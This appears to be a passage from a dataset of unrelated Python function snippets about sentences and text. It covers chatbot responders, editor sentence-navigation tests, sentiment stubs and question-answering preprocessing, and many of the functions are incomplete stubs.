hendrerit gravida rutrum quisque non tellus orci. Diam in arcu cursus euismod quis viverra nibh cras pulvinar. Habitasse platea dictumst quisque sagittis purus sit amet volutpat consequat. Elit ut aliquam purus sit. Dui faucibus in ornare quam viverra orci sagittis eu. Purus ut faucibus pulvinar elementum integer. Condimentum lacinia quis vel eros donec ac odio tempor. At in tellus integer feugiat scelerisque varius morbi. Augue eget arcu dictum varius duis. Aliquam sem et tortor consequat id. Bibendum arcu vitae elementum curabitur vitae. Massa sed elementum tempus egestas sed sed. Suscipit adipiscing bibendum est ultricies. Etiam tempor orci eu lobortis.\"\n self.gui.show_page(\"paginationExample.qml\")", "def test_make_sentences():\n long_comment = ['I think this movie was really good and will go and see it again. '\n 'This movie really sucked and I hated it']\n new_sentences = make_sentences(long_comment[0])\n print(new_sentences)", "def getSentenceInfo(sentence):\n\tpass", "def test_get_sentence_sentiments():\n long_comment = [\"This was a really sucky movie. I will probably never go see this movie ever again. I am going to \"\n \"tell my whole family never to watch this movie. I very much enjoyed the special cameo in it \"\n \"though. I loved the plot line.\"]\n\n sentence_score_list = get_sentence_sentiments(long_comment[0])\n print(long_comment[0])\n print('per sentence sentiment:', sentence_score_list)\n print()", "def nao_speech(possible_sentences):\n\n print(random.choice(possible_sentences))", "def hey(self, sentence=\"\"):\n if sentence == \"\" or sentence.replace(\" \", \"\") == \"\":\n return \"Fine. Be that way!\"\n if sentence.isupper():\n return \"Woah, chill out!\"\n if sentence[-1] == \"?\":\n return \"Sure.\"\n return \"Whatever.\"", "def main(words, s):\n if words:\n words = int(words)\n click.echo(lorem.words(words))\n\n # Returns a lorem ipsum sentence\n elif s:\n click.echo(lorem.sentence())\n\n # Returns a lorem ipsum paragraph by default\n else:\n click.echo(lorem.paragraph())", "def example_single(args, model, word2idx):\n #在命令行中加载和分段<目标、(推特内容)>配对\n while True:\n target = raw_input(\"问题: \")\n tweet = raw_input(\"回答: \")\n targets = [str(target)]\n tweets = [str(tweet)]\n seged_tweets = yutils.seg_sentence(tweets, choice=\"list\", place=\"hpc\") # may use lexicon here\n seged_targets = yutils.seg_sentence(targets, choice=\"list\", place=\"hpc\")\n predictions = evaluate(args, model, word2idx, seged_tweets, seged_targets)\n print(\"预测结果: \", predictions)", "def test_extend_to_sentence(self):\n before_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n after_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"3.5\", \"3.5\"),\n after_sel=(\"1.395\", \"3.142\"),\n command_name=\"extend-to-sentence\",\n )", "def handle_gui_example_one_intent(self, message):\n self.gui.show_text(\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec placerat varius turpis porta scelerisque. Nam feugiat, lectus a ultricies tempus, mi sem tempor felis, vitae laoreet nisi ipsum vitae mauris.\")", "def response(sentence, model, user_id='123', context={}, show_details=False):\n # Load intents\n data_path = os.path.join(\"data/\", \"data_intents.json\")\n with open(data_path) as json_data:\n intents = json.load(json_data)\n\n # Classify sentence\n results = classify(sentence, model)\n # if we have a classification then find the matching intent tag\n if results:\n # loop as long as there are matches to process\n while results:\n for i in intents['intents']:\n # find a tag matching the first result\n if i['tag'] == results[0][0]:\n # set context for this intent if necessary\n if 'context_set' in i:\n if show_details: print('context:', i['context_set'])\n context[user_id] = i['context_set']\n\n # check if this intent is contextual and applies to this user's conversation\n if not 'context_filter' in i or \\\n (user_id in context and 'context_filter' in i and i['context_filter'] == context[user_id]):\n if show_details: print ('tag:', i['tag'])\n # a random response from the intent\n if i[\"tag\"] == \"goodbye\":\n print(random.choice(i['responses']))\n sys.exit()\n else:\n return print(random.choice(i['responses']))\n\n results.pop(0)", "def subject_info(intent, extra_info=[]):\n\n text = intent['inputTranscript'].lower()\n utterances = AS.load_file('sample_utterances.txt')\n\n # add \"book\" and \"books\" to every utterance\n for line in list(utterances):\n utterances.insert(0, line + \" book\")\n utterances.insert(0, line + \" books\")\n\n # tells how many characters needs to be dropped before the subject starts\n to_drop = 0\n\n for line in utterances:\n if text.startswith(line):\n to_drop = len(line)\n break\n\n # drops the characters and makes a list from the strings that are left\n text = text[to_drop:].strip()\n text_list = text.split(' ', len(text))\n\n subject_list = []\n keywords = [\"books\", \"book\", \"by\", \"published\", \"written\"]\n keyword = \"\"\n\n # Find out when the book name ends\n for word in text_list:\n if word not in keywords:\n subject_list.append(word)\n else:\n break\n\n subject = \" \".join(subject_list)\n\n # Get all the keywords in the middle, so they can be\n # all be dropped at once, eg written by, books by\n text_list = text_list[len(subject_list):]\n if text_list:\n word = text_list[0]\n while word in keywords:\n keyword += word + \" \"\n text_list = text_list[1:]\n if text_list:\n word = text_list[0]\n else:\n break\n\n # search for an author from the rest of the characters\n author_text = text[len(keyword):].strip()\n author = AS.search(author_text, False)\n if author is \"\":\n author = None\n\n # There might be old info in the extra_info (author), so \n # we need to clear it\n extra_info.clear()\n\n # add the author to extra info so it can be used in the Finna API call\n if author:\n extra_info += [\"author:\\\"\" + author + \"\\\"\"]\n elif intent['sessionAttributes'].get('author'):\n extra_info += [\n \"author:\\\"\" + intent['sessionAttributes']['author'] + \"\\\"\"\n ]\n\n # The Finna API call\n request = lookfor(term=subject, filter=extra_info)['json']\n\n return parse_subject(request, subject, {'author': author})", "def intent_of_text_LnDOR(ChapterTextS, TargetQuestionsD, TestS, StopWords):\n \n # Chapter Text - stokenize\n StokensCT = stokenize(ChapterTextS, StopWords) \n\n # Test question - stokenize\n StokensTest = stokenize(TestS, StopWords)\n\n # Knowledge Base Dict - stokenize\n KBD_structure = stokenizeKBD(TargetQuestionsD, StopWords)\n\n # List (because list is mutable, set is not) of all stokens in document\n StokensDoc = StokensCT[:] # from chapter text\n StokensDoc.extend(StokensTest[:]) # += Test string\n\n # extend list of stokens in Doc\n for i in TargetQuestionsD:\n StokensDoc.extend(TargetQuestionsD[i][\"mq stokens\"][:]) # += KB target [matched Q]s\n StokensDoc.extend(TargetQuestionsD[i][\"ans stokens\"][:]) # += KB answers\n \n StokensTestV = set(StokensTest)\n StokensDocV = set(StokensDoc)\n StokensAntiTgtV = StokensDocV\n \n # Complement of all targets\n for i in TargetQuestionsD:\n StokensAntiTgtV = StokensAntiTgtV.difference(set(TargetQuestionsD[i][\"mq stokens\"]))\n \n # calculate confusion matrix and DOR etc.\n LnDORD = {}\n # Anti Target\n TP, FP, FN, TN = confusion_matrix(StokensDocV, StokensAntiTgtV, StokensTestV) \n LnDOR = lndor(TP, FP, FN, TN) \n someAngle = angleDOR(TP, FP, FN, TN) \n \n LnDORD[\"AntiTgt\"] = {'lndor': LnDOR, 'theta': someAngle}\n\n # total occurences\n total_occ = 0\n for i in TargetQuestionsD:\n total_occ += TargetQuestionsD[i]['count']\n\n for i in TargetQuestionsD:\n StokensTgtV = set(TargetQuestionsD[i][\"mq stokens\"][:])\n\n TP, FP, FN, TN = confusion_matrix(StokensDocV, StokensTgtV, StokensTestV) \n priorOR = TargetQuestionsD[i]['count'] / total_occ\n\n LnDOR = lndor(TP, FP, FN, TN) \n someAngle = angleDOR(TP, FP, FN, TN, priorOR) \n \n LnDORD[i] = {'lndor': LnDOR, 'theta': someAngle}\n # LnDORD = {i: {'lndor': , 'theta': }}, KB indices + \"AntiTgt\"\n\n return LnDORD", "def substantiate():", "def example(self, message, args):\n return \"Example\"", "def test_example():\n example_text = ['''Mark and Jack welcome back to couch on crackerjacks today I'm gonna show you how to make a basic and delicious potato salad some people might call this a country style potato salad some people might refer to it as a deli style of potato salad either way it's got the perfect balance of sweet and tangy from the sugar and the vinegar and pickles and everything else that's in this it's just your basic homemade potato salad you can add any number of things to this to make it your own but I'm just going to show you how I like to make mine so without further ado let's get started so naturally I'm going to start out with my potatoes every potato salad starts with potatoes for this recipe and for my potato salad I prefer using just regular old russet potatoes they're the cheapest they're the best I've tried using Yukon Gold potatoes and red potatoes for this recipe I prefer hands down at the russet potatoes it just it makes the best potato salad for me you can use whatever kind of potatoes you like though and using a potato peeler I'm just going to peel these potatoes a little trick for you that little end on most potato peelers it's kind of rounded use that to dig out the eyes of your potato it's what I've always used it for so it's just the perfect little tool to dig out the eyes of a potato but what you want to do is just go ahead and peel your potatoes and you don't have to peel your potatoes if you don't want to if you like skin on potato salad by all means go ahead and leave the skin on it doesn't make any difference personal preference and as you're peeling your potatoes and you get one done go ahead and put them into a large pot this is going to be the same profit I cut these in that's filled up with water you want to make sure and keep your potatoes covered that will prevent your potatoes from oxidizing and turning that pinky brown color but you just want to go through and peel all of your potatoes and I am using three pounds of potatoes for this recipe now once you get all your potatoes peeled you want to go ahead and cut them up basically you want to cut these into about 3/4 inch square pieces so for these medium potatoes I cut them half I turn them 90 degrees cut them into three pea is if you will that way if it's a larger potato do four and then cut those into chunks basically like I said you want about three quarters of an inch by three quarters of an inch by three quarters of an inch pieces and then again throw your potatoes back into the water that you pulled the potatoes out of that way they do not oxidize on you now when you get all your potatoes cut up your water is going to be cloudy and it's gonna be murky and it's gonna be just full of all the starch coming off of those potatoes what you want to do is rinse your potatoes well you want to make sure that the water coming off of that is completely clear go ahead and rinse these a good three or four times and then drain them completely you want to make sure that all of that starch gets off of those potatoes then you want to go ahead and light your stove and take your pot and you want a large pot for this put it over a medium-high heat time actually even high heat or at this point take your drained potatoes and put those into your pot and you want to add enough cold water to this to come up about one inch over the top of the potatoes starting off with cool water your potatoes cook evenly as the water comes up to temperature your potatoes come up with them to temperature if you start out putting cold potatoes into boiling water the outside of the potato is gonna be mush before the inside is actually cooked and before this gets going too far I'm gonna take two large eggs and I'm gonna put those in the water with the potatoes this recipe uses hard-boiled eggs and since I'm boiling the potatoes anyway I might as well just boil the eggs right along with the potatoes so just go ahead and add two large eggs to the pot and you want to cover your pot and you want to bring this up to a boil now once your water is that a boy I'll go ahead and give your potatoes an egg a gentle stir you want to be careful with this because you don't do not want to break your eggs and you also don't want to break up the potatoes but once this comes up to a boil you want to boil this for exactly ten minutes and how to check to make sure that your potatoes are done you want to take a couple large pieces take them out put them on a spoon and using a fork you want to put the fork into the potato and you want just a little bit of give in your potatoes before they break apart if you can see there it's just the slightest little bit of give before the potato breaks up you don't want to cook these any longer than that because they they will finish cooking when you take them off heat but you want to go ahead and drain these in a colander and once they are drained well go ahead and pour your potatoes and eggs back into the pot that you cooked them in and here you can dig out your eggs and you want to put your eggs in a bowl of cold water you want to stop that cooking process as soon as possible because if you cook your eggs too long you're gonna get that dreaded green ring around the yolk go ahead and put those in a bowl of cold water to stop the cooking process immediately and then you want to keep your potatoes in the pot that you cook them in to cool and you want to cool them completely before you do anything else with them if you add a salad dressing to hot potatoes it's gonna break on you and you don't want that so just go ahead and let your potatoes steam off and cool and I'm gonna let these sit for about a half an hour before I even start making the dressing for my potato salad and while you're waiting for your potatoes to cool off you can go ahead and peel your eggs it helps to wait a little bit for your eggs to cool down before you peel them just go ahead and crack them on a countertop and then start peeling them if you peel them underneath water or running water they peel super easy so as you can see here's I mean it takes nothing to do it under water water gets under there and the shell just slips off I just go ahead and peel your egg eggs and set them off until later I'm gonna need a few vegetables for my dressing I went ahead and already cut up half of a yellow onion here off a video I thought I was recording when I wasn't you don't need to see me chopped onions anyway everybody knows how to do that I've also got two stalks of celery here I'm just going to cut the ends off as well as the tops if you want to save the tops they make a nice garnish you don't have to keep them and I'm not gonna keep them here the celery I'm going to cut these sticks or stalks into orders and then I'm going to chop those up because I don't like really big chunks of celery in my potato salad so I'm just gonna cut these into four slices and then turn them around and cut these into dices if you will and I'm just going to go ahead after I get that died and set those off to the side until I need them later now for our dressing in a large bowl and you want to make sure that you use a plenty large bowl for this because it does make a lot of potato salad I've got one and a half cups of mayonnaise this recipe really does not work with Miracle Whip so since we're gonna be adding sugar to this stick to the plain old mayonnaise I'm gonna throw my eggs in there and using the back of a fork I'm just gonna break up my eggs if you like big chunks of egg in your potato salad don't mash it up as much but I'm gonna mash this up pretty fine and then you want to add in a quarter of a cup of sugar as well as a teaspoon and a half of salt it seems like a lot of salt it really isn't because there are a lot of potatoes here two teaspoons of white vinegar just plain white distilled vinegar then you want to add two tablespoons of sweet pickle relish you could also use dill pickle relish if you wanted to I like sweet in mine and finally I'm gonna add in two teaspoons of prepared yellow mustard if you like a more mustardy potato salad you can add more mustard if you want to this perfectly acceptable and then using a spoon or a fork whatever just go ahead and mix this up well and then you want to add in your onions and celery and go ahead and get that mixed in and you want to make sure to mix all of your ingredients and get your dressing thoroughly mixed before you add the potatoes because you don't want to over mix this once you get your potatoes added so go ahead and take your cooled potatoes again make sure that they are at least room temperature you do not want them warm or hot at all but go ahead and add those into your bowl and then using a spatula I'm going to gently fold the dressing into my potatoes you want your potatoes to remain as in this large of chunks as possible so don't go crazy you know stirring it stirring stirring you want to gently fold this so your potatoes do stay as whole as possible and a little secret for you just to bind up the dressing just a little bit I'm going to add two tablespoons of instant mashed potato flakes into the finished mixture I'm just going to fold this in basically what those do the potato flakes they bind up the dressing and make the dressing firm it also helps it kind of stick to the potatoes a little bit better so you you know the dressing doesn't run off of the potatoes which can be a problem with some recipes so there you go you want to make sure that those potato flakes are evenly distributed in there and everything is well mixed together everything is combined perfectly go ahead and give this a taste make sure that the salt is ok for you if you need a little bit more salt go ahead and add it if you want to if you need more mustard or vinegar or eggs whatever now is the time to do it but you want to go ahead and cover this with a piece of cling wrap saran wrap and refrigerate this for at least four to six hours before you serve this the longer you let this sit the better it gets but there you go there's your basic all-around simple homemade deli style or country style potato salad definitely give this recipe a try if you do let me know how you like it down below in the comment section if you like this video be sure to give it a thumbs up I would greatly appreciate it subscribe for more deliciousness and to keep up to date on all my latest videos thanks so much for watching and we will see you next time''']\n\n return str(example_text)", "def my_word_example_handler(handler_input):\n # type: (HandlerInput) -> Response\n slots = handler_input.request_envelope.request.intent.slots\n\n if synonym_slot in slots:\n curr_word = slots[synonym_slot].value\n handler_input.attributes_manager.session_attributes[\n synonym_slot_key] = curr_word\n\n try:\n synonyms = http_get(curr_word, True)\n\n if type(synonyms[0]) == dict:\n speech = (\"A synonym for {} is {}\".format(curr_word,\n synonyms[0]['meta']['syns'][0][0]))\n synonym_list = synonyms[0]['meta']['syns'][0]\n reprompt = (\"What word would you like a synonym for?\")\n else:\n speech = (\"No synonyms for {} are available. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like a synonym for?\")\n except:\n speech = (\"No synonyms for {} are available. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like a synonym for?\")\n else:\n speech = \"I'm not sure what word to find a synonym for, please try again\"\n reprompt = (\"I didn't catch that. What word would you like me \"\n \"me to look up a synonym for?\")\n\n handler_input.attributes_manager.session_attributes[previous_key] = speech\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def tt_entails(knowledge_base, sentence):\n return False", "def handle_sentence_complex(self, sentence, ctxinfo): \n global vocab\n global START_THRESHOLD \n global lower_attr\n \n for w_i, w in enumerate(sentence):\n case_class = w.get_case_class()\n # Does nothing if it's already lowercase or if it's not alphabetic\n\n if case_class != \"lowercase\" and case_class != \"?\":\n low_key = getattr(w, lower_attr).lower()\n token_stats = vocab[ low_key ]\n percents = get_percents( ctxinfo, token_stats )\n pref_form = get_preferred_form( percents )\n\n if case_class == \"UPPERCASE\" or case_class == \"MiXeD\" :\n if pref_form :\n setattr( w, lower_attr, pref_form ) \n # If the word is UPPERCASE or MiXed and does not have a \n # preferred form, what do you expect me to do about it? \n # Nothing, I just ignore it, it's a freaky weird creature! \n\n elif case_class == \"Firstupper\" :\n occurs = token_stats[ getattr( w, lower_attr) ]\n if ( w_i == 0 or\n re.match( \"[:\\.\\?!;]\", sentence[ w_i - 1 ].surface ) ) and \\\n float(occurs[ 1 ]) / float(occurs[ 0 ]) >= START_THRESHOLD :\n setattr( w, lower_attr, getattr( w, lower_attr ).lower() ) \n elif pref_form :\n setattr( w, lower_attr, pref_form )\n # Else, don't modify case, since we cannot know whether it\n # is a proper noun, a sentence start, a title word, a spell \n # error, etc.\n\n self.chain.handle_sentence(sentence, ctxinfo)", "def greeting(sentence):\n for word in sentence.split():\n if word.lower() in INPUTS:\n return random.choice(RESPONSES)", "def hey(sentence):\n if not sentence.strip():\n answer = 'Fine. Be that way!'\n elif sentence.isupper():\n answer = 'Woah, chill out!'\n elif sentence.endswith(\"?\"):\n answer = 'Sure.'\n else:\n answer = 'Whatever.'\n return answer", "def handle_sentence_simple(self, sentence, ctxinfo):\n global text_version\n global moses_version\n global lower_attr\n \n for w in sentence :\n setattr(w, lower_attr, getattr(w, lower_attr).lower())\n self.chain.handle_sentence(sentence, ctxinfo)", "def read_sentence(self,data):\n self.addSource(data)\n if self.checkLegal(data):\n self.addTarget(data)\n return True\n else:\n return False", "def score_sentence(self, sentence):\n\t\t\n\t\t# YOUR CODE HERE", "def test_model():\n test_text = \"what is the price of jug?\"\n model = spacy.load(\"../model/custom_ner_model\")\n doc = model(test_text)\n for ent in doc.ents:\n print(ent.text, ent.start_char, ent.end_char, ent.label_)", "def hasConstantForm(self, sentence):", "def getConstantSentenceForms(self):", "def create_example(line, tfidf_dict, is_training, args):\n sample = json.loads(line, object_pairs_hook=collections.OrderedDict)\n example_id = sample['example_id']\n question_text = sample['question_text']\n ori_doc_tokens = sample['document_text'].split()\n\n # 抽取特定段落list[list]\n tfidf_cands_ids = tfidf_dict[str(example_id)]\n # tfidf并不保证所有段落必定出现在所选段落内\n if is_training:\n long_answer_cand = sample['annotations'][0]['long_answer']['candidate_index']\n\n if long_answer_cand != -1:\n # answer_cand保证top_level是true\n if sample['long_answer_candidates'][long_answer_cand]['top_level'] is False:\n gt_start_token = sample['long_answer_candidates'][long_answer_cand]['start_token']\n gt_end_token = sample['long_answer_candidates'][long_answer_cand]['end_token']\n for il, cand in enumerate(sample['long_answer_candidates']):\n if cand['start_token'] <= gt_start_token and cand['end_token'] >= gt_end_token \\\n and cand['top_level'] is True:\n long_answer_cand = il\n break\n # training的时候当tfidf中没有包含正确答案,且long_answer是存在的时候,tfidf的结果则只选目标段落\n hit_answer = False\n for pids in tfidf_cands_ids:\n if long_answer_cand in pids:\n hit_answer = True\n break\n if hit_answer is False:\n tfidf_cands_ids = [[]]\n token_count = 0\n for ic, cand in enumerate(sample['long_answer_candidates']):\n if cand['top_level'] is True:\n tfidf_cands_ids[-1].append(ic)\n token_count += (cand['end_token'] - cand['start_token'])\n if token_count > 600:\n tfidf_cands_ids.append([])\n token_count = 0\n while len(tfidf_cands_ids[-1]) == 0:\n tfidf_cands_ids.pop(-1)\n # 防止负样本爆炸,只选目标段落\n tfidf_cands_ids = [cands for cands in tfidf_cands_ids if long_answer_cand in cands]\n\n # 由于接下来要对special_tokens排序,所以这里tfidf选择的段落要按照首段排序\n tfidf_cands_ids = sorted(tfidf_cands_ids, key=lambda x: x[0])\n\n if args.do_combine: # 如果do_combine,我们把所有抽取的candidates合并到一起\n tfidf_cands_ids_ = []\n for c in tfidf_cands_ids:\n tfidf_cands_ids_.extend(c)\n tfidf_cands_ids = [tfidf_cands_ids_]\n\n # 获取candidate的type信息,去除HTML符号\n # 保留特殊token到段首\n # 注意table paragraph list最小起步是1\n special_tokens_count = {'ContextId': -1, 'Table': 0, 'Paragraph': 0, 'List': 0}\n\n # 为了保证一致性,TABLE, Paragraph等结构信息还是尽可能保留...\n selected_ps = []\n for i, cand_ids in enumerate(tfidf_cands_ids):\n position_map = [] # 新paragraph到老paragraph的token位置映射\n map_to_origin = {} # 为了保证能够对答案位置进行正确的偏移,这里需要重新搞一波map映射\n p_tokens = []\n for cand_id in cand_ids:\n st = sample['long_answer_candidates'][cand_id]['start_token']\n ed = sample['long_answer_candidates'][cand_id]['end_token']\n ind = st # 追踪pos_map\n ori_cand_tokens = ori_doc_tokens[st:ed]\n # 先加ContextId特殊token\n special_tokens_count['ContextId'] += 1\n special_tokens_count['ContextId'] = min(special_tokens_count['ContextId'], args.max_position)\n p_tokens.append('[ContextId={}]'.format(special_tokens_count['ContextId']))\n position_map.append(ind)\n cand_type = get_candidate_type(ori_cand_tokens)\n if cand_type in special_tokens_count:\n special_tokens_count[cand_type] += 1\n special_tokens_count[cand_type] = min(special_tokens_count[cand_type], args.max_position)\n p_tokens.append('[' + cand_type + '=' + str(special_tokens_count[cand_type]) + ']')\n position_map.append(ind)\n for token in ori_cand_tokens:\n if '<' not in token: # 去除HTML符号\n p_tokens.append(token)\n position_map.append(ind)\n map_to_origin[ind] = len(position_map) - 1\n ind += 1\n assert len(position_map) == len(p_tokens)\n\n selected_ps.append({'paragraph_tokens': p_tokens,\n 'question_text': question_text,\n 'position_map': position_map,\n 'map_to_origin': map_to_origin,\n 'example_id': example_id,\n 'paragraph_id': str(example_id) + '_' + str(i),\n 'answer_type': AnswerType['UNKNOWN'],\n 'long_start': -1,\n 'long_end': -1,\n 'short_start': -1,\n 'short_end': -1,\n 'short_answer_text': None})\n\n answer = None\n answer_text = None\n if is_training and 'annotations' in sample:\n # 答案只取第一个标注\n annotation = sample['annotations'][0]\n if annotation is not None:\n long_answer = annotation['long_answer']\n if long_answer['candidate_index'] != -1:\n answer_type = AnswerType['LONG']\n ori_long_start = long_answer['start_token']\n ori_long_end = long_answer['end_token']\n else:\n answer_type = AnswerType['UNKNOWN']\n ori_long_start = -1\n ori_long_end = -1\n\n assert annotation[\"yes_no_answer\"] in (\"YES\", \"NO\", \"NONE\")\n if annotation[\"yes_no_answer\"] == 'YES':\n answer_text = 'YES'\n answer_type = AnswerType['YES']\n elif annotation[\"yes_no_answer\"] == 'NO':\n answer_text = 'NO'\n answer_type = AnswerType['NO']\n\n short_answers = annotation['short_answers']\n # 这里short answer必须排序\n short_answers = sorted(short_answers, key=lambda x: x['start_token'])\n if len(short_answers) > 0:\n # TODO:可能存在多个short,multi-tag\n answer_type = AnswerType['SHORT']\n short_ans = random.choice(short_answers)\n ori_short_start = short_ans['start_token']\n ori_short_end = short_ans['end_token']\n answer_text = ori_doc_tokens[ori_short_start:ori_short_end]\n answer_text = \" \".join([at for at in answer_text if '<' not in at])\n else:\n ori_short_start = -1\n ori_short_end = -1\n else:\n answer_type = AnswerType['UNKNOWN']\n ori_long_start = -1\n ori_long_end = -1\n ori_short_start = -1\n ori_short_end = -1\n\n answer = {'answer_type': answer_type,\n 'ori_long_start': ori_long_start,\n 'ori_long_end': ori_long_end,\n 'ori_short_start': ori_short_start,\n 'ori_short_end': ori_short_end}\n\n if answer['answer_type'] == AnswerType['SHORT'] and answer_text == \"\":\n print('WRONG SHORT', answer, answer_text)\n answer['answer_type'] = AnswerType['LONG']\n answer['ori_short_start'] = -1\n answer['ori_short_end'] = -1\n\n examples = []\n for p_sample in selected_ps:\n if answer and answer['answer_type'] != AnswerType['UNKNOWN']:\n # 如果长答案在候选里,那么首位必然都在这个候选里,!!!注意这里的ori_long_end必须-1,否则可能会漏!!!\n if answer['ori_long_start'] in p_sample['map_to_origin'] \\\n and answer['ori_long_end'] - 1 in p_sample['map_to_origin']:\n final_long_start = p_sample['map_to_origin'][answer['ori_long_start']]\n final_long_end = p_sample['map_to_origin'][answer['ori_long_end'] - 1] + 1\n long_answer_text = \" \".join(p_sample['paragraph_tokens'][final_long_start:final_long_end])\n\n p_sample['answer_type'] = answer['answer_type']\n p_sample['long_start'] = final_long_start\n p_sample['long_end'] = final_long_end\n\n # 短答案必然在长答案所在段落里面\n if answer['answer_type'] == AnswerType['SHORT']:\n final_short_start = p_sample['map_to_origin'][answer['ori_short_start']]\n final_short_end = p_sample['map_to_origin'][answer['ori_short_end'] - 1] + 1\n p_sample['short_start'] = final_short_start\n p_sample['short_end'] = final_short_end\n\n new_answer_text = \" \".join(p_sample['paragraph_tokens'][final_short_start:final_short_end])\n assert new_answer_text == answer_text, (new_answer_text, answer_text, long_answer_text)\n p_sample['short_answer_text'] = new_answer_text\n\n # 由于negative的段落太多了,所以这里先过滤掉一部分\n elif is_training and random.random() > args.example_neg_filter:\n continue\n\n # 由于negative的段落太多了,所以这里先过滤掉一部分\n elif is_training and random.random() > args.example_neg_filter:\n continue\n\n p_sample.pop('map_to_origin')\n examples.append(p_sample)\n\n return examples", "def stemming(self,sentence):", "async def phrase(self, ctx):\n await self.heleus.send_command_help(ctx)", "def handle_sentence(self, sentence, ctxinfo):\n global vocab\n global lower_attr\n prev_key = \"\"\n for w_i, w in enumerate(sentence):\n key = getattr(w, lower_attr)\n low_key = key.lower()\n forms = vocab.get( low_key, {} )\n form_entry = forms.get( key, [ 0, 0 ] )\n # a form entry has two counters, one for the occurrences and one for\n # the number of times it occurred at the beginning of a sentence. \n # Therefore, form_entry[0] >= form_entry[1]\n form_entry[ 0 ] = form_entry[ 0 ] + 1 \n # This form occurrs at the first position of the sentence or after a\n # period (semicolon, colon, exclamation or question mark). Count it\n if w_i == 0 or re.match( \"[:\\.\\?!;]\", prev_key ) :\n form_entry[ 1 ] = form_entry[ 1 ] + 1 \n forms[ key ] = form_entry\n vocab[ low_key ] = forms\n prev_key = key", "def generate_sentence(session, model, config, *args, **kwargs):\n return generate_text(session, model, config, *args, stop_tokens=['<eos>'], **kwargs)", "def test20():\n\tdef highlight_word(sentence, word):\n\t\treturn(\" \".join(x) for x in sentence.split())\n\n\tprint(highlight_word(\"Have a nice day\", \"nice\"))\n\tprint(highlight_word(\"Shhh, don't be so loud!\", \"loud\"))\n\tprint(highlight_word(\"Automating with Python is fun\", \"fun\"))", "def get_intro_message() -> str:\n return \"\"\"You are about to begin a new record.\nType the text sample you want to record.\nThis first sample MUST be typed by the real user (no impostor data).\"\"\"", "def generate_sentence(self,t=20):\n return result", "def create_examples(topics, sentences):\n input_examples = []\n \n for i in range(len(sentences)):\n input_examples.append(InputExample(text_a=topics[i], text_b=sentences[i], label='NoArgument'))\n return input_examples", "def test_forward_sentence_extend_selection(self):\n before_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n after_b = \"\"\"\\\n Americans live in the most severe weather-prone country on Earth. Each year, Americans cope with an average of 10,000 thunderstorms, 2,500 floods, 1,000 tornadoes, as well as an average of 6 deadly hurricanes. Potentially deadly weather impacts every American. Communities can now rely on the National Weather Service’s StormReady program to help them guard against the ravages of Mother Nature.\n\n Some 90% of all presidentially declared disasters are weather related, leading to around 500 deaths per year and nearly $14 billion in damage. StormReady, a program started in 1999 in Tulsa, OK, helps arm America's communities with the communication and safety skills needed to save lives and property– before and during the event. StormReady helps community leaders and emergency managers strengthen local safety programs.\n\n StormReady communities are better prepared to save lives from the onslaught of severe weather through better planning, education, and awareness. No community is storm proof, but StormReady can help communities save lives. Does StormReady make a difference?\n \"\"\"\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"1.264\", \"1.264\"),\n after_sel=(\"1.264\", \"1.395\"),\n command_name=\"forward-sentence-extend-selection\",\n )", "def main():\n if sentence(Parser()):\n print 'yes'\n else:\n print 'no'", "def negation_check(self,sentence):", "def parser(sent_list): #input: list of sentences", "def process_input(fname,onlynugget,onlyarg):\n content=utils.readFileEncode(fname,'utf8')\n lines = content.split('\\n')[:-1]\n sentences=[]\n labels=[]\n sent=[]\n label=[]\n for i in range(len(lines)):\n if len(lines[i])>3:\n words=lines[i].split('\\t')\n word={'originalText':words[0],'offset':int(words[1])}\n sent.append(word)\n if onlynugget:\n if words[2] in NuggetList10:\n label.append(words[2]) \n else:\n label.append('O')\n elif onlyarg:\n if words[2] in ArgumentList:\n\n if 'Software' in words[2]:\n label.append(words[2][0:2]+'System')\n else:\n label.append(words[2])\n else:\n label.append('O')\n else:\n if len(sent)>0 and len(label)>0: \n sentences.append(sent)\n labels.append(label) \n sent=[]\n label=[]\n elif len(sent)==0 and i < len(lines)-1:\n sentences.append([])\n labels.append([])\n \n return sentences,labels", "def greeting(sentence):\r\n 